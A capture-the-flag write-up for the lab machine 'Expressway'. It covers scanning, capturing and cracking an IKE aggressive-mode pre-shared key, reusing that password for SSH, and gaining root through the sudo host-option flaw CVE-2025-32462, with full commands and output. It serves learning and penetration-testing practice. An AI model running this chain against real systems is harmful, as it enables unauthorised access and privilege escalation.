Expressway - CSPSec

![[Expressway.png]] # Reconnaissance Started off with an Nmap scan and specified the following options: - `-sC` to use default scripts - `-sV` to gather service/version information - `-oA` to save the output to a file - `-p-` to scan all TCP ports In a another tab, I ran an Nmap scan and specified the following options: - `-sU` to specify a UDP scan - `-oA` to save the output to a file Looking at the results, there are only two open ports, TCP port 22 and UDP port 500. ```bash ┌─[us-dedivip-1]─[10.10.14.219]─[cspsec@htb-28hfzlcs5x]─[~] └──╼ [★]$ echo -e "\ntarget_ip=10.129.114.201\ntarget_domain=expressway.htb" | tee -a ~/.bashrc target_ip=10.129.114.201 target_domain=expressway.htb ┌─[us-dedivip-1]─[10.10.14.219]─[cspsec@htb-28hfzlcs5x]─[~] └──╼ [★]$ exec bash ┌─[us-dedivip-1]─[10.10.14.219]─[cspsec@htb-28hfzlcs5x]─[~] └──╼ [★]$ echo -e "\n$target_ip $target_domain" | sudo tee -a /etc/hosts 10.129.114.201 expressway.htb ┌─[us-dedivip-1]─[10.10.14.219]─[cspsec@htb-28hfzlcs5x]─[~/my_data/Expressway] └──╼ [★]$ sudo nmap -sC -sV -oA nmap/full.tcp -p- $target_ip Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-10-09 20:55 CDT Nmap scan report for expressway.htb (10.129.114.201) Host is up (0.0088s latency). Not shown: 65534 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 10.0p2 Debian 8 (protocol 2.0) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 8.23 seconds ┌─[us-dedivip-1]─[10.10.14.219]─[cspsec@htb-28hfzlcs5x]─[~/my_data/Expressway] └──╼ [★]$ sudo nmap -sU -oA nmap/udp $target_ip Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-10-09 20:56 CDT Nmap scan report for expressway.htb (10.129.114.201) Host is up (0.20s latency). Not shown: 996 closed udp ports (port-unreach) PORT STATE SERVICE 68/udp open|filtered dhcpc 69/udp open|filtered tftp 500/udp open isakmp 4500/udp open|filtered nat-t-ike Nmap done at Thu Oct 9 21:15:10 2025 -- 1 IP address (1 host up) scanned in 1124.52 seconds ``` # Initial Access ## IKE Enumeration Even though this is an easy box, I knew brute forcing SSH was not going to lead to initial access, but I tried anyway. No surprise there: no valid credentials were found, so I moved on to enumerating UDP port 500. This was the first time I had enumerated UDP port 500 and was not familiar with the Internet Key Exchange protocol, also known as IKE. The IKE protocol facilitates the creation of secure IPsec tunnels between two devices by setting up a security association. There are two phases associated with IKE. During the first phase, the two devices negotiate a security association, establish a secure management tunnel, and authenticate with each other via a pre-shared key, digital signatures, or public key encryption. Once done, phase two commences. During this phase, the two devices create a separate, secure channel (IPsec tunnel) for the VPN connection. `ike-scan` is a fantastic tool that can enumerate IKE. First, I fingerprinted the service and performed transformation enumeration. Based on the response from the endpoint, the following information was gathered: - Encryption type is 3DES - Hash type is SHA1 - Auth type is PSK ```bash ┌─[us-dedivip-1]─[10.10.14.219]─[cspsec@htb-28hfzlcs5x]─[~/my_data/Expressway] └──╼ [★]$ sudo ike-scan -M $target_ip Starting ike-scan 1.9.5 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/) 10.129.114.201 Main Mode Handshake returned HDR=(CKY-R=93a2990d3c27dbe9) SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800) VID=09002689dfd6b712 (XAUTH) VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0) Ending ike-scan 1.9.5: 1 hosts scanned in 0.018 seconds (54.25 hosts/sec). 1 returned handshake; 0 returned notify ``` The Auth type of PSK piqued my interest. With this Auth type, it is possible to obtain a hash from the endpoint that can be cracked offline. To do so, run `ike-scan` with the following options: - `-P` to crack aggressive mode pre-shared keys - `-M` to split the payload into multiple lines, making it easier to read - `-A` to use Aggressive mode - `-n fakeID` to specify an identification value - `--pskcrack=hash.txt` to save the output to a file for offline cracking ```bash ┌─[us-dedivip-1]─[10.10.14.219]─[cspsec@htb-28hfzlcs5x]─[~/my_data/Expressway] └──╼ [★]$ sudo ike-scan -P -M -A -n fakeID --pskcrack=hash.txt $target_ip Starting ike-scan 1.9.5 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/) 10.129.114.201 Aggressive Mode Handshake returned HDR=(CKY-R=dd4a87e2d28c9a4b) SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800) KeyExchange(128 bytes) Nonce(32 bytes) ID(Type=ID_USER_FQDN, [email protected]) VID=09002689dfd6b712 (XAUTH) VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0) Hash(20 bytes) Ending ike-scan 1.9.5: 1 hosts scanned in 0.020 seconds (48.80 hosts/sec). 1 returned handshake; 0 returned notify ``` To crack the hash, run the following command. ```bash ┌─[us-dedivip-1]─[10.10.14.219]─[cspsec@htb-28hfzlcs5x]─[~/my_data/Expressway] └──╼ [★]$ psk-crack -d /usr/share/wordlists/rockyou.txt hash.txt Starting psk-crack [ike-scan 1.9.5] (http://www.nta-monitor.com/tools/ike-scan/) Running in dictionary cracking mode key "freakingrockstarontheroad" matches SHA1 hash 07b5ae8ecd2b641017244581c3b3054bec2beb93 Ending psk-crack: 8045040 iterations in 6.467 seconds (1243926.51 iterations/sec) ``` From the IKE Aggressive mode handshake, the peer's identity was leaked. And thanks to password reuse, I was able to SSH into the target machine as the user `ike`. # Privilege Escalation ## Abusing `sudo`'s Host Option After a bit of enumeration, I discovered that the target system's `sudo` version was 1.9.17. There are a couple of CVEs associated with this version of `sudo`. I decided to pursue CVE-2025-32462. This CVE allows an attacker to bypass host-based security policies by specifying a `--host` value. A system's `/etc/sudoers` file can specify what a user can do on a local or remote system. Say a user has no `sudo` rights on host A but has unlimited `sudo` rights on host B. In this case, CVE-2025-32462 can be abused so that the user has the rights associated with host B (unrestricted) on host A. To determine if the CVE is even exploitable, I needed to find a valid hostname. After looking in the logs, I found a reference to `offramp.expressway.htb`. And just like that, I was able to exploit CVE-2025-32462 to gain `root` privileges! As `root`, it was possible to look at the `/etc/sudoers` file and confirm that the user `ike` had host-based restrictions. ```bash ike@expressway:~$ sudo -l We trust you have received the usual lecture from the local System Administrator. It usually boils down to these three things: #1) Respect the privacy of others. #2) Think before you type. #3) With great power comes great responsibility. For security reasons, the password you type will not be visible. Password: Sorry, user ike may not run sudo on expressway. ike@expressway:~$ sudo -V Sudo version 1.9.17 Sudoers policy plugin version 1.9.17 Sudoers file grammar version 50 Sudoers I/O plugin version 1.9.17 Sudoers audit plugin version 1.9.17 ike@expressway:~$ grep '.htb' -r /var/log 2>/dev/null /var/log/squid/access.log.1:1753229688.902 0 192.168.68.50 TCP_DENIED/403 3807 GET http://offramp.expressway.htb - HIER_NONE/- text/html ike@expressway:~$ sudo -l -h offramp.expressway.htb Matching Defaults entries for ike on offramp: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty User ike may run the following commands on offramp: (root) NOPASSWD: ALL (root) NOPASSWD: ALL ike@expressway:~$ sudo -i -h offramp.expressway.htb root@expressway:~# id uid=0(root) gid=0(root) groups=0(root) root@expressway:~# cat /etc/sudoers | grep '^#' -v ...SNIP... Host_Alias SERVERS = expressway.htb, offramp.expressway.htb Host_Alias PROD = expressway.htb ike SERVERS, !PROD = NOPASSWD:ALL ike offramp.expressway.htb = NOPASSWD:ALL ...SNIP... ``` # References - [Pentesting IPsec/IKE VPN](https://book.hacktricks.wiki/en/network-services-pentesting/ipsec-ike-vpn-pentesting.html) - [`ike-scan` Github Page](https://github.com/royhills/ike-scan) - [CVE-2025-32462](https://access.redhat.com/security/cve/cve-2025-32462) - [CVE-2025-32462 POC](https://www.exploit-db.com/exploits/52354)